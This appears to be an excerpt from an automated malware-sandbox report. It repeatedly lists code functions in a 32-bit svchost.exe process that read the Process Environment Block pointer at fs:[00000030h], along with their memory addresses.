Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]	2_2_0396E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]	2_2_0396E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]	2_2_039B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]	2_2_039B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]	2_2_039B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]	2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]	2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]	2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]	2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]	2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]	2_2_039402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]	2_2_039402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]	2_2_039402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A062D6 mov eax, dword ptr fs:[00000030h]	2_2_03A062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392823B mov eax, dword ptr fs:[00000030h]	2_2_0392823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392A250 mov eax, dword ptr fs:[00000030h]	2_2_0392A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03936259 mov eax, dword ptr fs:[00000030h]	2_2_03936259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h]	2_2_039EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h]	2_2_039EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B8243 mov eax, dword ptr fs:[00000030h]	2_2_039B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B8243 mov ecx, dword ptr fs:[00000030h]	2_2_039B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]	2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]	2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]	2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]	2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]	2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]	2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]	2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]	2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]	2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]	2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]	2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]	2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]	2_2_03934260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]	2_2_03934260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]	2_2_03934260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392826B mov eax, dword ptr fs:[00000030h]	2_2_0392826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A0625D mov eax, dword ptr fs:[00000030h]	2_2_03A0625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]	2_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]	2_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]	2_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]	2_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]	2_2_0392A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]	2_2_0392A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]	2_2_0392A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03970185 mov eax, dword ptr fs:[00000030h]	2_2_03970185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]	2_2_039EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]	2_2_039EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]	2_2_039D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]	2_2_039D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A061E5 mov eax, dword ptr fs:[00000030h]	2_2_03A061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]	2_2_039F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]	2_2_039F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039601F8 mov eax, dword ptr fs:[00000030h]	2_2_039601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DA118 mov ecx, dword ptr fs:[00000030h]	2_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]	2_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]	2_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]	2_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F0115 mov eax, dword ptr fs:[00000030h]	2_2_039F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]	2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]	2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]	2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]	2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]	2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]	2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]	2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]	2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]	2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]	2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03960124 mov eax, dword ptr fs:[00000030h]	2_2_03960124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392C156 mov eax, dword ptr fs:[00000030h]	2_2_0392C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C8158 mov eax, dword ptr fs:[00000030h]	2_2_039C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h]	2_2_03A04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h]	2_2_03A04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]	2_2_03936154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]	2_2_03936154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]	2_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]	2_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C4144 mov ecx, dword ptr fs:[00000030h]	2_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]	2_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]	2_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393208A mov eax, dword ptr fs:[00000030h]	2_2_0393208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F60B8 mov eax, dword ptr fs:[00000030h]	2_2_039F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_039F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039280A0 mov eax, dword ptr fs:[00000030h]	2_2_039280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C80A8 mov eax, dword ptr fs:[00000030h]	2_2_039C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B20DE mov eax, dword ptr fs:[00000030h]	2_2_039B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0392C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039720F0 mov ecx, dword ptr fs:[00000030h]	2_2_039720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0392A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039380E9 mov eax, dword ptr fs:[00000030h]	2_2_039380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B60E0 mov eax, dword ptr fs:[00000030h]	2_2_039B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]	2_2_0394E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]	2_2_0394E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]	2_2_0394E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]	2_2_0394E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B4000 mov ecx, dword ptr fs:[00000030h]	2_2_039B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]	2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]	2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]	2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]	2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]	2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]	2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]	2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]	2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C6030 mov eax, dword ptr fs:[00000030h]	2_2_039C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392A020 mov eax, dword ptr fs:[00000030h]	2_2_0392A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392C020 mov eax, dword ptr fs:[00000030h]	2_2_0392C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03932050 mov eax, dword ptr fs:[00000030h]	2_2_03932050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B6050 mov eax, dword ptr fs:[00000030h]	2_2_039B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395C073 mov eax, dword ptr fs:[00000030h]	2_2_0395C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D678E mov eax, dword ptr fs:[00000030h]	2_2_039D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039307AF mov eax, dword ptr fs:[00000030h]	2_2_039307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E47A0 mov eax, dword ptr fs:[00000030h]	2_2_039E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0393C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B07C3 mov eax, dword ptr fs:[00000030h]	2_2_039B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]	2_2_039347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]	2_2_039347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]	2_2_039527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]	2_2_039527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]	2_2_039527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_039BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03930710 mov eax, dword ptr fs:[00000030h]	2_2_03930710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03960710 mov eax, dword ptr fs:[00000030h]	2_2_03960710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396C700 mov eax, dword ptr fs:[00000030h]	2_2_0396C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]	2_2_0396273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396273C mov ecx, dword ptr fs:[00000030h]	2_2_0396273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]	2_2_0396273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AC730 mov eax, dword ptr fs:[00000030h]	2_2_039AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]	2_2_0396C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]	2_2_0396C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03930750 mov eax, dword ptr fs:[00000030h]	2_2_03930750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039BE75D mov eax, dword ptr fs:[00000030h]	2_2_039BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]	2_2_03972750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]	2_2_03972750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B4755 mov eax, dword ptr fs:[00000030h]	2_2_039B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396674D mov esi, dword ptr fs:[00000030h]	2_2_0396674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]	2_2_0396674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]	2_2_0396674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03938770 mov eax, dword ptr fs:[00000030h]	2_2_03938770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]	2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]	2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]	2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]	2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]	2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]	2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]	2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]	2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]	2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]	2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]	2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]	2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]	2_2_03934690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]	2_2_03934690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039666B0 mov eax, dword ptr fs:[00000030h]	2_2_039666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0396C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0396A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0396A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_039AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_039AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_039AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_039AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]	2_2_039B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]	2_2_039B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972619 mov eax, dword ptr fs:[00000030h]	2_2_03972619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AE609 mov eax, dword ptr fs:[00000030h]	2_2_039AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]	2_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]	2_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]	2_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]	2_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]	2_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]	2_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]	2_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394E627 mov eax, dword ptr fs:[00000030h]	2_2_0394E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03966620 mov eax, dword ptr fs:[00000030h]	2_2_03966620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03968620 mov eax, dword ptr fs:[00000030h]	2_2_03968620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393262C mov eax, dword ptr fs:[00000030h]	2_2_0393262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394C640 mov eax, dword ptr fs:[00000030h]	2_2_0394C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03962674 mov eax, dword ptr fs:[00000030h]	2_2_03962674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]	2_2_039F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]	2_2_039F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]	2_2_0396A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]	2_2_0396A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396E59C mov eax, dword ptr fs:[00000030h]	2_2_0396E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03932582 mov eax, dword ptr fs:[00000030h]	2_2_03932582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03932582 mov ecx, dword ptr fs:[00000030h]	2_2_03932582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03964588 mov eax, dword ptr fs:[00000030h]	2_2_03964588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]	2_2_039545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]	2_2_039545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]	2_2_039B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]	2_2_039B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]	2_2_039B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039365D0 mov eax, dword ptr fs:[00000030h]	2_2_039365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0396A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0396A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]	2_2_0396E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]	2_2_0396E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039325E0 mov eax, dword ptr fs:[00000030h]	2_2_039325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]	2_2_0396C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]	2_2_0396C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C6500 mov eax, dword ptr fs:[00000030h]	2_2_039C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]	2_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]	2_2_03A04500
